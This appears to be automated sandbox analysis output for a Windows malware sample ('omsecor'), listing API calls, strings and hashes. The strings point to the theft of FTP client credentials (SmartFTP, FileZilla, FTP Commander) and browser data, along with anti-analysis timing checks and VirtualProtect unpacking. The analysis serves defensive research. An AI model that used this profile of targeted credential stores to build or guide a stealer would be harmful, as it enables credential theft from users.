                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: EnvironmentExpandOpenStrings
                          • String ID: SOFTWARE\smartftp\client 2.0\settings\backup$SOFTWARE\smartftp\client 2.0\settings\general\favorites$folder$personal favorites
                          • API String ID: 3923277744-821743658
                          • Opcode ID: e843f97767911fec9b6fd3034691d6ab50a9750596cd8693bb12be5acb83529b
                          • Instruction ID: 0454e2dbaba930a1c05830d090df37f1eb9a44f33d61805f8e12f109ce5a2445
                          • Opcode Fuzzy Hash: e843f97767911fec9b6fd3034691d6ab50a9750596cd8693bb12be5acb83529b
                          • Instruction Fuzzy Hash: 21213E71D00518ABDB10EB95DC41ADFB7BCEB44318F1084B7E514B2181EB389B49CFA9
                          APIs
                          • CoInitialize.OLE32(00000000), ref: 0040A0C0
                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
                          • CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CreateHandleInitializeModuleWindow
                          • String ID: AtlAxWin$Shell.Explorer
                          • API String ID: 950422046-1300462704
                          • Opcode ID: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
                          • Instruction ID: 8885d0d040d3ab3e1edd42f45155a7fe84e7bff231f75e8e802cb7627400a982
                          • Opcode Fuzzy Hash: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
                          • Instruction Fuzzy Hash: 78118F30200200FFD320ABA6CC4CE6B7BBCEFCA711B240579F515EB291D7789801CA65
                          APIs
                          • GetSystemTime.KERNEL32(?,?,000003E8,?,?,?,?,?,?,?,?,?,?,?,00407B63,?), ref: 0040727C
                          • SystemTimeToFileTime.KERNEL32(?,?,?,000003E8,?), ref: 004072C1
                          • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 004072CB
                          • __aulldiv.LIBCMT ref: 004072E3
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Time$System$File$__aulldiv
                          • String ID: c{@
                          • API String ID: 3735792614-264719814
                          • Opcode ID: a145c05d1847671377470c3096bfc685d9fda3d476ef25e64420ea8c3ac11d0d
                          • Instruction ID: ef19eb4ac8525f4bf2260e0142840e6d018c3cac6eb9bd4f47b1f5cd165e8a78
                          • Opcode Fuzzy Hash: a145c05d1847671377470c3096bfc685d9fda3d476ef25e64420ea8c3ac11d0d
                          • Instruction Fuzzy Hash: D401DE62D1022DAACB01DFE4D984CEFB77DFF44348B00156AE901F7250E7B5AA4887A5
                          APIs
                          • GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040286E), ref: 004072F9
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00407337
                          • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 00407341
                          • __aulldiv.LIBCMT ref: 00407359
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Time$System$File$__aulldiv
                          • String ID: n(@
                          • API String ID: 3735792614-2525614082
                          • Opcode ID: fb9972a15ff1dd7e61217f7ff9a5823acba4978d5a12943579487cf22718de7c
                          • Instruction ID: 0875687ad9f8fbdff1f190dbab39d4211c2ed1a8acd2afdabfbd9ccbaffc37b8
                          • Opcode Fuzzy Hash: fb9972a15ff1dd7e61217f7ff9a5823acba4978d5a12943579487cf22718de7c
                          • Instruction Fuzzy Hash: 83011A66D2022DAACF00DBE5DD44CEFB7BCFF44344B04051AE901B3210E7B5A648CBA9
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040AB93
                          • CharLowerW.USER32(?), ref: 0040ABA0
                          • GetCommandLineW.KERNEL32 ref: 0040ABC0
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CharCommandFileLineLowerModuleName
                          • String ID: /updatefile3$netprotdrvss.exe
                          • API String ID: 3118597399-3449771660
                          • Opcode ID: a9092c2346d55b23f20d8634028d89874de2ded0d1b8197c9b1551ea588aa001
                          • Instruction ID: 1eba2a713c21f7c79877a49aa3ec6850c44e44909145826ab611dd80b60fa5a6
                          • Opcode Fuzzy Hash: a9092c2346d55b23f20d8634028d89874de2ded0d1b8197c9b1551ea588aa001
                          • Instruction Fuzzy Hash: 41E09B3655021A5AD750FBB1DD07BA633ACFB01705F1049B6A246F10C0EE74D55D4F9D
                          APIs
                          • GetTickCount.KERNEL32 ref: 00409FCE
                          • GetTickCount.KERNEL32 ref: 00409FDE
                          • Sleep.KERNEL32(00000064,?,?,0040A442,?,?), ref: 00409FEC
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
                          • DispatchMessageW.USER32(?), ref: 0040A009
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CountMessageTick$DispatchPeekSleep
                          • String ID:
                          • API String ID: 4159783438-0
                          • Opcode ID: 45312298ad5970842c5ee584b14830e042aefe59ca6bdbaf3830585a06b866aa
                          • Instruction ID: c0dc46c0c87f7bc49602bd7d2efae9f565a6f52602c3eafe7569a8fa2f6b8eea
                          • Opcode Fuzzy Hash: 45312298ad5970842c5ee584b14830e042aefe59ca6bdbaf3830585a06b866aa
                          • Instruction Fuzzy Hash: 3F118671D103199ECB10AFF5CC8899F7BB9BB45314B144A7AE161F71E0C778CA118B1A
                          APIs
                          • GetTickCount.KERNEL32 ref: 00409F5B
                          • GetTickCount.KERNEL32 ref: 00409F5F
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
                          • DispatchMessageW.USER32(?), ref: 00409F80
                          • Sleep.KERNEL32(0000012C,?,?,?,?,00000000), ref: 00409F8D
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CountMessageTick$DispatchPeekSleep
                          • String ID:
                          • API String ID: 4159783438-0
                          • Opcode ID: 57f1528c1cf960ce56ea9ee11f0e0f6d2bf2bfe74b8bc540e63205e3b9b5f8f9
                          • Instruction ID: 2f378a1af0056e794f94b22e0cd08b0b0b180d2e60cd5d2ebdc62f673b65dbb1
                          • Opcode Fuzzy Hash: 57f1528c1cf960ce56ea9ee11f0e0f6d2bf2bfe74b8bc540e63205e3b9b5f8f9
                          • Instruction Fuzzy Hash: D1F0C872D042149BD714B7F2DD09B7D76A89B45714F104A36F551F70D1CA7CCD148A58
                          APIs
                            • Part of subcall function 0040A469: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040A535
                            • Part of subcall function 0040A469: InternetSetOptionW.WININET(00000000,00000041,00000000,00000004), ref: 0040A551
                            • Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5B
                            • Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5F
                            • Part of subcall function 00409F2B: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
                            • Part of subcall function 00409F2B: DispatchMessageW.USER32(?), ref: 00409F80
                            • Part of subcall function 00409F2B: Sleep.KERNEL32(0000012C,?,?,?,?,00000000), ref: 00409F8D
                          • CharLowerW.USER32(?,?,?,00423DD4,?,00000001), ref: 00408751
                          • SysFreeString.OLEAUT32(?), ref: 0040875A
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CountInternetMessageTick$CharDispatchFreeLowerOpenOptionPeekSleepString
                          • String ID: http://$+@
                          • API String ID: 147727044-3628382792
                          • Opcode ID: a6511d5d8b0c810daf140c5c911559c37a96c1275369982660b5569d586a1c5f
                          • Instruction ID: 305e6509dfdc939f3ffb47eba37a7af79922f54013ecb7534e3961c93d2e4cc1
                          • Opcode Fuzzy Hash: a6511d5d8b0c810daf140c5c911559c37a96c1275369982660b5569d586a1c5f
                          • Instruction Fuzzy Hash: 4E41D5729002199BCF15AF66CD056EFBBB4FF44314F20447FE981B3292DB3889528B99
                          APIs
                          • SetFilePointer.KERNEL32(00414F68,00000000,00000000,00000000,UniqueNum,00000001), ref: 00407E09
                          • WriteFile.KERNEL32(00000078,00000064,00000001,00000000), ref: 00407E20
                            • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                            • Part of subcall function 00407CD7: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$CreateModuleNamePointerWrite
                          • String ID: UniqueNum$x
                          • API String ID: 594998759-2399716736
                          • Opcode ID: 0d1cac2645660f3edc8ae4858b9aa10093ebf6a3be27c46c4cc389029dd9494e
                          • Instruction ID: 8c5cde1ed6458afa5e70834db293a7f07ca8c6efd1b8e13f0da2095665a79c5a
                          • Opcode Fuzzy Hash: 0d1cac2645660f3edc8ae4858b9aa10093ebf6a3be27c46c4cc389029dd9494e
                          • Instruction Fuzzy Hash: F72129329002186BDF04AB74ED49DDF3B69EF44315F104636FA02E71E1E634D951C799
                          APIs
                          • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 0040413A
                            • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                            • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                            • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                            • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                            • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                            • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                            • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
                          • String ID: #$&$*filezilla*
                          • API String ID: 3438805939-758400021
                          • Opcode ID: 7f420262a527ace9c0fec2a61cbcbac63df6dda7f3825d1df3812bb47b8bab04
                          • Instruction ID: af0dd5899ef73ee7264a7e51d90439c8fcf38b6470501fb51340e8e2557856c3
                          • Opcode Fuzzy Hash: 7f420262a527ace9c0fec2a61cbcbac63df6dda7f3825d1df3812bb47b8bab04
                          • Instruction Fuzzy Hash: 8E1151B2901128BADB10EA92DC49EDF7BBCEF85304F00407AF605B6080E7385785CBE9
                          APIs
                          • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 00404AE5
                            • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                            • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                            • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                            • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                            • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                            • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                            • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
                          • String ID: #$&$ftp*commander*
                          • API String ID: 3438805939-1149875651
                          • Opcode ID: 371d79112eeabe7a5308543586f4c365cccc6d4de9a1601f9ce447be0e8ea6cb
                          • Instruction ID: 4761086559ade70d73b1403ca51e5d3bc462c500c99379e4fd01d7d946a964d6
                          • Opcode Fuzzy Hash: 371d79112eeabe7a5308543586f4c365cccc6d4de9a1601f9ce447be0e8ea6cb
                          • Instruction Fuzzy Hash: B61121B2901118BADB10AA92DC49EDF7F7CEF85704F00407AF609B6180E7799785CBA9
                          APIs
                          • SysFreeString.OLEAUT32(?), ref: 004094A9
                          • SysFreeString.OLEAUT32(?), ref: 004094AE
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FreeString
                          • String ID: _blank$an.yandex.ru/count
                          • API String ID: 3341692771-25359924
                          • Opcode ID: 4ab6eb577aae85ed23f24708000ea2df93b57f18851f250654f87edd31753785
                          • Instruction ID: 1eacecae91598e8b756cf85833a4a3bbf756f1dfdfc5fa02fd6c22f827bf3b29
                          • Opcode Fuzzy Hash: 4ab6eb577aae85ed23f24708000ea2df93b57f18851f250654f87edd31753785
                          • Instruction Fuzzy Hash: 28015A35204114BBDB109FA6CD05D9B77A8EF85324724443BBC15E7291E779EE02CA69
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                          • GetCurrentDirectoryW.KERNEL32(00001000,?,?,00407E44,00000001,UniqueNum), ref: 00407D15
                          • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$CreateCurrentDirectoryModuleName
                          • String ID: \merocz.xc6
                          • API String ID: 3818821825-505599559
                          • Opcode ID: 2f84b54d5be0d3dae659ee3f303fbd3ad06020502789306fc31ef9c8cba0b7e5
                          • Instruction ID: bb9f2ddab4bab237696810683399403c99d26191ea9c434de7a02090ea9b9a12
                          • Opcode Fuzzy Hash: 2f84b54d5be0d3dae659ee3f303fbd3ad06020502789306fc31ef9c8cba0b7e5
                          • Instruction Fuzzy Hash: DA01A231904224ABE7309B569C49FEB77ADEF85710F00447FB505F20D1D6749A80CAAA
                          APIs
                          • SysAllocString.OLEAUT32(?), ref: 00409868
                          • SysAllocString.OLEAUT32(?), ref: 00409876
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AllocString
                          • String ID: "URL"$"encrypted"
                          • API String ID: 2525500382-4151690107
                          • Opcode ID: f6e867073f93e28a707ce71cee5b1d0d556dab41e30d3c647449298916898aec
                          • Instruction ID: 961e294ab5ae80d7ab2f0271a6faa46f3ea3f555f1d55132cdad114d364c87da
                          • Opcode Fuzzy Hash: f6e867073f93e28a707ce71cee5b1d0d556dab41e30d3c647449298916898aec
                          • Instruction Fuzzy Hash: 62F0D671A0021DA7CF00AB69CC01FD637ECAB4438CF1484B6F904F32C1E974EA098B98
                          APIs
                          • SysAllocString.OLEAUT32(?), ref: 004097ED
                          • SysAllocString.OLEAUT32(?), ref: 004097FB
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AllocString
                          • String ID: "domain"$"url"
                          • API String ID: 2525500382-2438671658
                          • Opcode ID: 98133a6a8bfb7a18a2a86276567a63b94d588fd2e230135a268bf1c7eb2bd3b5
                          • Instruction ID: 610bf4d9b2292206f8ef054453b19a236663fc5a2da35db14ea77673b97cd822
                          • Opcode Fuzzy Hash: 98133a6a8bfb7a18a2a86276567a63b94d588fd2e230135a268bf1c7eb2bd3b5
                          • Instruction Fuzzy Hash: 08F0A271A0021DA6CF41AAA9CC05FD637E8AB44348F1444B6F908F7281EA78EA188B94
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Internet Explorer,00000000,00000001,00000000,?,?,00402C77), ref: 00406C91
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Open
                          • String ID: Build$SOFTWARE\Microsoft\Internet Explorer$w,@
                          • API String ID: 71445658-3061378640
                          • Opcode ID: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
                          • Instruction ID: 930cfdd3d9e2cf302383723a85cc45ac24d6ba1b6d45bcf7a76994dd36721e6e
                          • Opcode Fuzzy Hash: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
                          • Instruction Fuzzy Hash: FBE08672664218FAEF009B929C07FDA77ACDB00758F20086AF502F10C1DAB5F714D6AC
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                            • Part of subcall function 0040845D: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000008,00000000,?,?,004084C5,?,?,?,00000008,?,00403796,?), ref: 00408475
                            • Part of subcall function 0040845D: RegCloseKey.ADVAPI32(?,?,004084C5,?,?,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408484
                          • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408524
                          • GetProcessHeap.KERNEL32(00000000,00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408534
                          • HeapFree.KERNEL32(00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 0040853B
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$CloseEnvironmentExpandFreeOpenProcessQueryStringsValue
                          • String ID:
                          • API String ID: 3604167287-0
                          • Opcode ID: debf70bf2fb47a5e7b7c0995a40a49e648bf285b45755a0d6fc166e7e3eeac12
                          • Instruction ID: 704a8cbe2313c99ccb7bf4cac6d27c9c5720caa44ca6f9902b9fd9ccb38d811f
                          • Opcode Fuzzy Hash: debf70bf2fb47a5e7b7c0995a40a49e648bf285b45755a0d6fc166e7e3eeac12
                          • Instruction Fuzzy Hash: 0521C871900626BBDF205B748E45ABF3668EF05328F10063EF561F22D0EB758D508658
                          APIs
                          • CharLowerW.USER32(00408E44,00000000,00000000,?,00408E44,00408795), ref: 004095A4
                          • CharLowerW.USER32(00408795), ref: 004095D8
                          • SysFreeString.OLEAUT32(00408795), ref: 00409608
                          • SysFreeString.OLEAUT32(00408E44), ref: 0040960D
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CharFreeLowerString
                          • String ID:
                          • API String ID: 2335467167-0
                          • Opcode ID: ff78d62f8bf35a608bc63f02c9c9fafbc1ea89148f156ec964e1e543baeabb3a
                          • Instruction ID: 6911929459278785efe31e607170db17e103bee024a9a22ae291265c1613d99e
                          • Opcode Fuzzy Hash: ff78d62f8bf35a608bc63f02c9c9fafbc1ea89148f156ec964e1e543baeabb3a
                          • Instruction Fuzzy Hash: 20116D72D00108BBDB019F9ADC85B9E7BB8EF44305F1544BAE405F21A1D779AE409F44
                          APIs
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004081A3
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                          • String ID: -
                          • API String ID: 885266447-2547889144
                          • Opcode ID: b815d9a6725b7b7d4663accafdf12bc662ce9b6e2c1759233b63132321253c45
                          • Instruction ID: cbf3f064ca1262f0759db58cdf0f181467b31290bd4ebff5f053a9a619aca6df
                          • Opcode Fuzzy Hash: b815d9a6725b7b7d4663accafdf12bc662ce9b6e2c1759233b63132321253c45
                          • Instruction Fuzzy Hash: 58415D31D0422699CB2177B98E417BB61A9DF44758F1440BFF9C0B72C2EEBC5D8581AE

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 90 4012c0-4012e8 FindFirstFileA call 401080
                          APIs
                          • FindFirstFileA.KERNELBASE(ks clku .d,6C489B6B), ref: 004012DD
                            • Part of subcall function 00401080: GetTickCount.KERNEL32 ref: 00401096
                            • Part of subcall function 00401080: GetDesktopWindow.USER32 ref: 004010B8
                            • Part of subcall function 00401080: GetClassNameA.USER32(00000000,00000000,00000400), ref: 004010CC
                            • Part of subcall function 00401080: GlobalAlloc.KERNELBASE(00000000,000F6950), ref: 004010EE
                            • Part of subcall function 00401080: GetCurrentProcess.KERNEL32(?), ref: 0040114B
                            • Part of subcall function 00401080: GetProcessIoCounters.KERNEL32(00000000), ref: 0040114E
                            • Part of subcall function 00401080: GetCurrentProcess.KERNEL32(?,?,?,?), ref: 004011B9
                            • Part of subcall function 00401080: GetProcessTimes.KERNELBASE(00000000), ref: 004011BC
                          Strings
                          Memory Dump Source
                          • Source File: 0000001A.00000002.2374099617.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001A.00000002.2374028457.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 0000001A.00000002.2374099617.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 0000001A.00000002.2374203937.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_26_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Process$Current$AllocClassCountCountersDesktopFileFindFirstGlobalNameTickTimesWindow
                          • String ID: ks clku .d
                          • API String ID: 973805369-4096487313
                          • Opcode ID: f572dfb4ccbad4a63051ea1b90dc6402510860d94203dc7c9fb76134c3d65c66
                          • Instruction ID: 8201e92c16030f82e268503128fd01f75d7624b5287a074f0a6a6b49dcde2be8
                          • Opcode Fuzzy Hash: f572dfb4ccbad4a63051ea1b90dc6402510860d94203dc7c9fb76134c3d65c66
                          • Instruction Fuzzy Hash: 13C012701042448FC330AF24DE0ABAA37E4AB48300F00093AA5E8E60A4DA3455598A8A

                          Control-flow Graph

                          APIs
                          • GetTickCount.KERNEL32 ref: 00401096
                          • GetDesktopWindow.USER32 ref: 004010B8
                          • GetClassNameA.USER32(00000000,00000000,00000400), ref: 004010CC
                          • GlobalAlloc.KERNELBASE(00000000,000F6950), ref: 004010EE
                          • GetCurrentProcess.KERNEL32(?), ref: 0040114B
                          • GetProcessIoCounters.KERNEL32(00000000), ref: 0040114E
                          • GetCurrentProcess.KERNEL32(?,?,?,?), ref: 004011B9
                          • GetProcessTimes.KERNELBASE(00000000), ref: 004011BC
                          Strings
                          • cjkU dklu UUido c;aopi quio ,mvnciu cxklnsp, xrefs: 00401131
                          Memory Dump Source
                          • Source File: 0000001A.00000002.2374099617.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001A.00000002.2374028457.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 0000001A.00000002.2374099617.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 0000001A.00000002.2374203937.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_26_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Process$Current$AllocClassCountCountersDesktopGlobalNameTickTimesWindow
                          • String ID: cjkU dklu UUido c;aopi quio ,mvnciu cxklnsp
                          • API String ID: 509927810-2920797944
                          • Opcode ID: e0b8abb97aa25d1df5e5a951dd4f26f151847d18626d26f9063e3e0a3aa5dc8f
                          • Instruction ID: 30898c1c04428891cb82ceb7e239a2b08516cd6c9376f1465321758e23d54b14
                          • Opcode Fuzzy Hash: e0b8abb97aa25d1df5e5a951dd4f26f151847d18626d26f9063e3e0a3aa5dc8f
                          • Instruction Fuzzy Hash: E55127F1D041744BDB288B298D54BB9BBF5ABC5305F0881BEE689B7381D5385A48CF28

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 17 407a98-407a9f GetModuleHandleA 18 407aa1-407ab0 call 407ab5 17->18 19 407adf 17->19 29 407ab2-407abd GetProcAddress 18->29 30 407b17 18->30 20 407ae1-407ae5 19->20 22 407b24 call 407b29 20->22 23 407ae7-407aef GetModuleHandleA 20->23 26 407af1-407af9 23->26 26->26 28 407afb-407afe 26->28 28->20 31 407b00-407b02 28->31 29->19 33 407abf-407acc VirtualProtect 29->33 32 407b18-407b20 30->32 36 407b04-407b06 31->36 37 407b08-407b10 31->37 41 407b22 32->41 34 407ade 33->34 35 407ace-407adc VirtualProtect 33->35 34->19 35->34 39 407b11-407b12 GetProcAddress 36->39 37->39 39->30 41->28
                          APIs
                          • GetModuleHandleA.KERNEL32(00407A8F), ref: 00407A98
                          • GetModuleHandleA.KERNEL32(?,00407A8F), ref: 00407AEA
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00407B12
                            • Part of subcall function 00407AB5: GetProcAddress.KERNEL32(00000000,00407AA6), ref: 00407AB6
                            • Part of subcall function 00407AB5: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00407AA6,00407A8F), ref: 00407AC8
                            • Part of subcall function 00407AB5: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00407AA6,00407A8F), ref: 00407ADC
                          Memory Dump Source
                          • Source File: 0000001A.00000002.2374099617.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001A.00000002.2374028457.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 0000001A.00000002.2374099617.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 0000001A.00000002.2374203937.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_26_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProcProtectVirtual
                          • String ID:
                          • API String ID: 2099061454-0
                          • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                          • Instruction ID: 53099f65029657388ac4b193d9ffb221688749bb3c6439a8311ebbe5e3b7996f
